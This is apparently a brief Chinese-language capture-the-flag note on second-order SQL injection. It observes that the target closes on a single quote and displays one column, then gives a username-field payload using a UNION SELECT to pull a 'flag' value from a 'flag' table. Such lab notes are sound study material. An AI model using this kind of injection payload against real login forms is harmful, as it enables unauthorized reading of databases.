二次注入

测试是单引号闭合+一咧显示

username=1’ union select flag from flag#&password=1